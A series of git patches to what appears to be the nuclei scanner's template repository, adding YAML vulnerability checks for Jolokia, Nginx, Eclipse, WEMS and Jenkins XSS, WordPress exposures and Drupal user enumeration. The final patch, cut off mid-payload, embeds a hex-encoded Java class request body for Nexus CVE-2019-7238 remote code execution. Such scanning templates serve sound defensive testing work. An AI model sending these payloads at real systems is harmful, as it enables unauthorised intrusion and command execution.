From 211309301424169f38f7585f61f5380b4d98242f Mon Sep 17 00:00:00 2001 From: flag007 <66717990+flag007@users.noreply.github.com> Date: Thu, 27 Aug 2020 20:27:47 +0800 Subject: [PATCH 01/36] Update CVE-2018-1000129.yaml There are two problems with this payload, / means the path, add it cannot be detected correctly, in addition, it should not be url-encoded --- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml index ebaf25b0e0..46ba8c2eec 100644 --- a/cves/CVE-2018-1000129.yaml +++ b/cves/CVE-2018-1000129.yaml @@ -8,9 +8,9 @@ info: requests: - method: GET path: - - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" - - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - type: status @@ -18,5 +18,5 @@ requests: - 200 - type: word words: - - "" + - "" part: body From 10bc6dbef635ab759e739c630223c152cd3223b4 Mon Sep 17 00:00:00 2001 From: flag007 <66717990+flag007@users.noreply.github.com> Date: Thu, 27 Aug 2020 20:32:15 +0800 Subject: [PATCH 02/36] Update CVE-2018-1000129.yaml A single svg is prone to false positives, let me update the payload --- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml index 46ba8c2eec..c1a75edf2a 100644 --- a/cves/CVE-2018-1000129.yaml +++ b/cves/CVE-2018-1000129.yaml @@ -8,9 +8,9 @@ info: requests: - method: GET path: - - "{{BaseURL}}/jolokia/read?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" - - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - type: status @@ -18,5 +18,5 @@ requests: - 200 - type: word words: - - "" + - "" part: body From d107dc26ad74d3a78a5a4dc85f8b7f60a8f98342 Mon Sep 17 00:00:00 2001 From: un-fmunozs Date: Sat, 29 Aug 2020 12:40:08 -0500 Subject: [PATCH 03/36] Update favicon-detection.yaml Add jira, gitlab and fixed wordpress hash --- technologies/favicon-detection.yaml | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 29c18ba38f..28ec32ffa5 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -14,8 +14,10 @@ info: # 17542,e16377344d2d52a15e735041b3eb2c5a,jenkins # 1150,6d2adf39ca320265830403dfc030033a,liferay # 3638,59a0c7b6e4848ccdabcea0636efda02b,blogger - # 198,59a0c7b6e4848ccdabcea0636efda02b,wordpress - # 5430,59a0c7b6e4848ccdabcea0636efda02b,wordpress + # 5430,c291c057816f71ce15ba5c496f1a965a,wordpress + # 1611,f7e3d97f404e71d302b3239eef48d5f2,gitlab + # 6093,88717398db158e3330ce94fc1784e4a7,jira + # 2494,88717398db158e3330ce94fc1784e4a7,jira requests: - method: GET @@ -61,11 +63,23 @@ requests: name: jenkins dsl: - "len(body)==17542 && status_code==200 && (\"23e8c7bd78e8cd826c5a6073b15068b1\" == md5(body))" - - type: dsl - name: wordpress - dsl: - - "len(body)==198 && status_code==200 && (\"c6acedaff906029fc5455d9ec52c7f42\" == md5(body))" - type: dsl name: wordpress dsl: - "len(body)==5430 && status_code==200 && (\"c291c057816f71ce15ba5c496f1a965a\" == md5(body))" + - type: dsl + name: gitlab + dsl: + - "len(body)==1611 && status_code==200 && (\"f7e3d97f404e71d302b3239eef48d5f2\" == md5(body))" + - type: dsl + name: jira + dsl: + - "len(body)==6093 && status_code==200 && (\"88717398db158e3330ce94fc1784e4a7\" == md5(body))" + - type: dsl + name: jira + dsl: + - "len(body)==2494 && status_code==200 && (\"04d89d5b7a290334f5ce37c7e8b6a349\" == md5(body))" + - type: dsl + name: confluence + dsl: + - "len(body)==4259 && status_code==200 && (\"966e60f8eb85b7ea43a7b0095f3e2336\" == md5(body))" From 4f9de168afe56a48f9086f5c11d52159672345ed Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 09:57:07 +0530 Subject: [PATCH 04/36] drafting cve --- cves/CVE-2017-7529.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/CVE-2017-7529.yaml diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml new file mode 100644 index 0000000000..6c5a7b9b16 --- /dev/null +++ b/cves/CVE-2017-7529.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-7529 +info: + author: "Harsh Bothra" + name: "Nginx Remote Integer Overflow" + severity: medium + description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. + +# This template supports the detection part only. +# Do not test any website without permission +# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Range: bytes=-17208,-9223372036854758792 + Connection: close + matchers-condition: and + matchers: + - type: status + status: + - 206 + - type: word + words: + - Content-Range + part: header From 3ff2f585c5f9e7e873f043be0edb06d7014210c1 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:02:59 +0530 Subject: [PATCH 05/36] Update CVE-2018-1000129.yaml --- cves/CVE-2018-1000129.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml index c1a75edf2a..c3c5808622 100644 --- a/cves/CVE-2018-1000129.yaml +++ b/cves/CVE-2018-1000129.yaml @@ -8,9 +8,9 @@ info: requests: - method: GET path: - - "{{BaseURL}}/jolokia/read?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" - - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - type: status @@ -18,5 +18,5 @@ requests: - 200 - type: word words: - - "" + - "" part: body From a850c41aa1d15c7f601701fc3d597eca0aa4dc88 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 30 Aug 2020 11:58:14 +0700 Subject: [PATCH 06/36] :hammer: Add server matcher --- cves/CVE-2017-7529.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml index 6c5a7b9b16..fee2667d75 100644 --- a/cves/CVE-2017-7529.yaml +++ b/cves/CVE-2017-7529.yaml @@ -1,23 +1,23 @@ id: CVE-2017-7529 info: - author: "Harsh Bothra" + author: "Harsh Bothra & @dwisiswant0" name: "Nginx Remote Integer Overflow" severity: medium description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. -# This template supports the detection part only. -# Do not test any website without permission -# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py + # This template supports the detection part only. + # Do not test any website without permission + # https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py requests: - raw: - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Range: bytes=-17208,-9223372036854758792 - Connection: close + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Range: bytes=-17208,-9223372036854758792 + Connection: close matchers-condition: and matchers: - type: status @@ -25,5 +25,6 @@ requests: - 206 - type: word words: - - Content-Range + - "Server: nginx" + - "Content-Range" part: header From f40edfcbb82b42578caa362fcd05159305ff68c0 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 30 Aug 2020 12:04:34 +0700 Subject: [PATCH 07/36] :hammer: Add 'and' condition --- cves/CVE-2017-7529.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/CVE-2017-7529.yaml b/cves/CVE-2017-7529.yaml index fee2667d75..894cd713e1 100644 --- a/cves/CVE-2017-7529.yaml +++ b/cves/CVE-2017-7529.yaml @@ -27,4 +27,5 @@ requests: words: - "Server: nginx" - "Content-Range" + condition: and part: header From 5a860c63edd56c011d6ac5a15efa6da75251d38e Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:35:28 +0530 Subject: [PATCH 08/36] Create eclipse-help-system-xss.yaml --- vulnerabilities/eclipse-help-system-xss.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 vulnerabilities/eclipse-help-system-xss.yaml diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/eclipse-help-system-xss.yaml new file mode 100644 index 0000000000..9727dac10d --- /dev/null +++ b/vulnerabilities/eclipse-help-system-xss.yaml @@ -0,0 +1,20 @@ +id: eclipse-help-system-xss + +info: + name: Eclipse Help System RXSS vulnerability + author: pikpikcu + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/help/index.jsp?view=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body From 01d055aa1fe4da728f550186ac01532fabd1398d Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 10:38:28 +0530 Subject: [PATCH 09/36] Update eclipse-help-system-xss.yaml --- vulnerabilities/eclipse-help-system-xss.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/eclipse-help-system-xss.yaml index 9727dac10d..5e7420ea46 100644 --- a/vulnerabilities/eclipse-help-system-xss.yaml +++ b/vulnerabilities/eclipse-help-system-xss.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium + # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml + requests: - method: GET path: From 140716bac8a0f8a774a9c4e831d634353ac69f49 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 11:10:09 +0530 Subject: [PATCH 10/36] Create wems-manager-xss.yaml --- vulnerabilities/wems-manager-xss.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/wems-manager-xss.yaml diff --git a/vulnerabilities/wems-manager-xss.yaml b/vulnerabilities/wems-manager-xss.yaml new file mode 100644 index 0000000000..a5e89859d3 --- /dev/null +++ b/vulnerabilities/wems-manager-xss.yaml @@ -0,0 +1,24 @@ +id: wems-manager-xss + +info: + name: WEMS Enterprise Manager XSS + author: pikpikcu + severity: medium + + # Source + # https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html + # https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/wems-enterprise-xss.yaml + +requests: + - method: GET + path: + - '{{BaseURL}}/guest/users/forgotten?email=">' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '">' + part: body From cd35c5db351307cdd82850df6186d3840721c99d Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 13:34:09 +0530 Subject: [PATCH 11/36] Update README.md --- README.md | 33 +++++++++++++++++++++++++++------ 1 file changed, 27 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index d21217d3f5..bfaf4ef1f7 100644 --- a/README.md +++ b/README.md @@ -12,10 +12,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n Template Directory ``` -├── LICENSE.md -├── README.md ├── cves │   ├── CVE-2017-10075.yaml +│   ├── CVE-2017-14849.yaml +│   ├── CVE-2017-5638.yaml │   ├── CVE-2017-7529.yaml │   ├── CVE-2017-9506.yaml │   ├── CVE-2017-9841.yaml @@ -37,7 +37,9 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2018-5230.yaml │   ├── CVE-2018-7490.yaml │   ├── CVE-2019-10475.yaml +│   ├── CVE-2019-11248.yaml │   ├── CVE-2019-11510.yaml +│   ├── CVE-2019-11580.yaml │   ├── CVE-2019-12314.yaml │   ├── CVE-2019-14322.yaml │   ├── CVE-2019-14974.yaml @@ -51,9 +53,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2019-19908.yaml │   ├── CVE-2019-19985.yaml │   ├── CVE-2019-2588.yaml +│   ├── CVE-2019-2725.yaml │   ├── CVE-2019-3396.yaml │   ├── CVE-2019-3799.yaml │   ├── CVE-2019-5418.yaml +│   ├── CVE-2019-6112.yaml │   ├── CVE-2019-7609.yaml │   ├── CVE-2019-8449.yaml │   ├── CVE-2019-8451.yaml @@ -66,6 +70,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2020-12720.yaml │   ├── CVE-2020-13167.yaml │   ├── CVE-2020-13379.yaml +│   ├── CVE-2020-17505.yaml +│   ├── CVE-2020-17506.yaml │   ├── CVE-2020-2096.yaml │   ├── CVE-2020-3187.yaml │   ├── CVE-2020-3452.yaml @@ -78,12 +84,14 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── CVE-2020-7961.yaml │   ├── CVE-2020-8091.yaml │   ├── CVE-2020-8115.yaml +│   ├── CVE-2020-8163.yaml │   ├── CVE-2020-8191.yaml │   ├── CVE-2020-8193.yaml │   ├── CVE-2020-8194.yaml │   ├── CVE-2020-8512.yaml │   ├── CVE-2020-8982.yaml │   ├── CVE-2020-9484.yaml +│   ├── CVE-2020-9496.yaml │   └── CVE-2020-9757.yaml ├── default-credentials │   ├── grafana-default-credential.yaml @@ -97,10 +105,11 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n ├── files │   ├── apc-info.yaml │   ├── cgi-test-page.yaml -│   ├── debug-pprof.yaml │   ├── dir-listing.yaml │   ├── docker-registry.yaml +│   ├── druid-monitor.yaml │   ├── drupal-install.yaml +│   ├── ds_store.yaml │   ├── elasticsearch.yaml │   ├── exposed-kibana.yaml │   ├── exposed-svn.yaml @@ -144,6 +153,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── kubernetes-pods.yaml │   ├── mongo-express-web-gui.yaml │   ├── parallels-html-client.yaml +│   ├── pfsense-web-gui.yaml │   ├── phpmyadmin-panel.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml @@ -153,8 +163,10 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── supervpn-panel.yaml │   ├── swagger-panel.yaml │   ├── tikiwiki-cms.yaml +│   ├── traefik-dashboard │   ├── weave-scope-dashboard-detect.yaml -│   └── webeditors.yaml +│   ├── webeditors.yaml +│   └── workspaceone-uem-airWatch-dashboard-detect.yaml ├── payloads │   └── CVE-2020-6287.xml ├── security-misconfiguration @@ -166,6 +178,8 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── jira-unauthenticated-popular-filters.yaml │   ├── jira-unauthenticated-projects.yaml │   ├── jira-unauthenticated-user-picker.yaml +│   ├── missing-x-frame-options.yaml +│   ├── put-method-enabled.yaml │   ├── rack-mini-profiler.yaml │   ├── springboot-detect.yaml │   ├── wamp-xdebug-detect.yaml @@ -174,10 +188,12 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── detect-all-takeovers.yaml │   └── s3-subtakeover.yaml ├── technologies +│   ├── artica-web-proxy-detect.yaml │   ├── bigip-config-utility-detect.yaml │   ├── citrix-vpn-detect.yaml │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml +│   ├── favicon-detection.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── graphql.yaml @@ -188,7 +204,6 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── linkerd-badrule-detect.yaml │   ├── linkerd-ssrf-detect.yaml │   ├── netsweeper-webadmin-detect.yaml -│   ├── ntlm-directories.yaml │   ├── prometheus-exposed-panel.yaml │   ├── s3-detect.yaml │   ├── sap-netweaver-as-java-detect.yaml @@ -200,6 +215,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n ├── tokens │   ├── amazon-mws-auth-token-value.yaml │   ├── aws-access-key-value.yaml +│   ├── credentials-disclosure.yaml │   ├── google-api-key.yaml │   ├── http-username-password.yaml │   ├── mailchimp-api-key.yaml @@ -209,6 +225,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── couchdb-adminparty.yaml │   ├── crlf-injection.yaml │   ├── discourse-xss.yaml +│   ├── eclipse-help-system-xss.yaml │   ├── git-config-nginxoffbyslash.yaml │   ├── ibm-infoprint-directory-traversal.yaml │   ├── microstrategy-ssrf.yaml @@ -220,16 +237,20 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n │   ├── pdf-signer-ssti-to-rce.yaml │   ├── rce-shellshock-user-agent.yaml │   ├── rce-via-java-deserialization.yaml +│   ├── sick-beard-xss.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml +│   ├── wems-manager-xss.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows + ├── artica-web-proxy-workflow.yaml ├── bigip-pwner-workflow.yaml + ├── cisco-asa-workflow.yaml ├── grafana-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml @@ -243,7 +264,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n -13 directories, **214 templates**. +13 directories, **235 templates**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From f4f36ec0c6f420d798e0d2816c3d45567cdfe999 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 18:49:02 +0530 Subject: [PATCH 12/36] Update CVE-2018-1000129.yaml --- cves/CVE-2018-1000129.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/CVE-2018-1000129.yaml b/cves/CVE-2018-1000129.yaml index b51c65fc8b..3d28d874ee 100644 --- a/cves/CVE-2018-1000129.yaml +++ b/cves/CVE-2018-1000129.yaml @@ -9,9 +9,9 @@ info: requests: - method: GET path: - - "{{BaseURL}}/jolokia/read?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" - - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - type: status @@ -19,5 +19,5 @@ requests: - 200 - type: word words: - - "" - part: body + - "" + part: body \ No newline at end of file From ad6897e9c2c7c2f180bbda774c4af53299ccf6f0 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:03:04 -0300 Subject: [PATCH 13/36] Update wordpress-directory-listing.yaml Add other paths susceptible to directory listing. --- files/wordpress-directory-listing.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/files/wordpress-directory-listing.yaml b/files/wordpress-directory-listing.yaml index dab4a9ddf1..fde2f1cc21 100644 --- a/files/wordpress-directory-listing.yaml +++ b/files/wordpress-directory-listing.yaml @@ -9,6 +9,10 @@ requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/" + - "{{BaseURL}}/wp-content/themes/" + - "{{BaseURL}}/wp-content/plugins/" + - "{{BaseURL}}/wp-content/plugins/hustle/views/admin/dashboard/" + - "{{BaseURL}}/wp-includes/" matchers-condition: and matchers: - type: status @@ -16,4 +20,4 @@ requests: - 200 - type: word words: - - Index of /wp-content/uploads + - Index of / From 841c47d7f6a1444ef1a409c302e15e89acc9c817 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 20:38:55 +0530 Subject: [PATCH 14/36] Update wordpress-directory-listing.yaml --- files/wordpress-directory-listing.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/files/wordpress-directory-listing.yaml b/files/wordpress-directory-listing.yaml index fde2f1cc21..07eb4bbc09 100644 --- a/files/wordpress-directory-listing.yaml +++ b/files/wordpress-directory-listing.yaml @@ -11,7 +11,6 @@ requests: - "{{BaseURL}}/wp-content/uploads/" - "{{BaseURL}}/wp-content/themes/" - "{{BaseURL}}/wp-content/plugins/" - - "{{BaseURL}}/wp-content/plugins/hustle/views/admin/dashboard/" - "{{BaseURL}}/wp-includes/" matchers-condition: and matchers: From f7e807b0248853dc479f032225ff463ab93eb292 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:41:22 -0300 Subject: [PATCH 15/36] Create wordpress-debug-log.yaml --- files/wordpress-debug-log.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 files/wordpress-debug-log.yaml diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml new file mode 100644 index 0000000000..4e31422043 --- /dev/null +++ b/files/wordpress-debug-log.yaml @@ -0,0 +1,22 @@ +id: wp-debug-log + +info: + name: WordPress debug log + author: geraldino2 + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + + - type: status + status: + - 200 From 800a3a7db5507a7470bcb1dc8719e3db71505fa3 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 12:42:58 -0300 Subject: [PATCH 16/36] Update wordpress-workflow.yaml --- workflows/wordpress-workflow.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 3b89e82520..5a3f683fd4 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,6 +11,7 @@ variables: wordpress_duplicator_path_traversal: vulnerabilities/wordpress-duplicator-path-traversal.yaml wordpress_wordfence_xss: vulnerabilities/wordpress-wordfence-xss.yaml wordpress_cve_1: cves/CVE-2019-9978.yaml + wordpress_debug_log: files/wordpress-debug-log.yaml logic: | wordpress_tech() @@ -23,4 +24,5 @@ logic: | wordpress_duplicator_path_traversal() wordpress_wordfence_xss() wordpress_cve_1() + wordpress_debug_log() } From 6357461ef332ddf9eb0e86fec7af6de964c6c21c Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 30 Aug 2020 21:27:24 +0530 Subject: [PATCH 17/36] Update wordpress-debug-log.yaml --- files/wordpress-debug-log.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml index 4e31422043..afa317a2ff 100644 --- a/files/wordpress-debug-log.yaml +++ b/files/wordpress-debug-log.yaml @@ -9,6 +9,8 @@ requests: - method: GET path: - "{{BaseURL}}/wp-content/debug.log" + + matchers-condition: and matchers: - type: word words: @@ -16,7 +18,7 @@ requests: - text/plain part: header condition: or - + - type: status status: - - 200 + - 200 \ No newline at end of file From 6e0a78c4ac9b56cc54b1b75a0cc9e54f3a43970e Mon Sep 17 00:00:00 2001 From: Oways Date: Sun, 30 Aug 2020 19:04:30 +0300 Subject: [PATCH 18/36] Create drupal-user-enum-redirect.yaml --- .../drupal-user-enum-redirect.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/drupal-user-enum-redirect.yaml diff --git a/vulnerabilities/drupal-user-enum-redirect.yaml b/vulnerabilities/drupal-user-enum-redirect.yaml new file mode 100644 index 0000000000..beb97c91b5 --- /dev/null +++ b/vulnerabilities/drupal-user-enum-redirect.yaml @@ -0,0 +1,30 @@ +id: drupal-user-enum-redirect + +info: + name: Drupal User Enumration [Redirect] + author: 0w4ys + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/user/0" + - "{{BaseURL}}/user/1" + - "{{BaseURL}}/user/2" + - "{{BaseURL}}/user/3" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+' + part: header + - type: status + status: + - 301 + extractors: + - type: regex + part: header + regex: + - 'users\/\w+' From 635446eb26618a8ae09c3398b4c8793d775883d3 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 14:42:46 -0300 Subject: [PATCH 19/36] Create CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/CVE-2020-2140.yaml diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml new file mode 100644 index 0000000000..30ce5cd722 --- /dev/null +++ b/cves/CVE-2020-2140.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-2140 +info: + author: j3ssie/geraldino2 + description: Jenkin rXSS vulnerability + name: Jenkin Audit XSS + severity: medium +requests: + - matchers: + - status: + - 200 + type: status + - part: body + type: word + words: + -

sample + matchers-condition: and + method: GET + path: + - >- + {{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample + - >- + {{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample From 5fa09b15cc91058e379aeebd06a708be1c6e5134 Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 15:03:30 -0300 Subject: [PATCH 20/36] Create CVE-2019-7238.yaml --- cves/CVE-2019-7238.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/CVE-2019-7238.yaml diff --git a/cves/CVE-2019-7238.yaml b/cves/CVE-2019-7238.yaml new file mode 100644 index 0000000000..f4621fe67d --- /dev/null +++ b/cves/CVE-2019-7238.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-7238 +info: + author: geraldino2 + name: Nexus Repository Manager 3 RCE + severity: high +requests: + - body: > + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": + [{"direction": "ASC", "property": "name"}], "start": 0, "filter": + [{"property": "repositoryName", "value": "*"}, {"property": "expression", + "value": "function(x, y, z, c, integer, defineClass){ + c=1.class.forName('java.lang.Character'); integer=1.class; + x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c0085008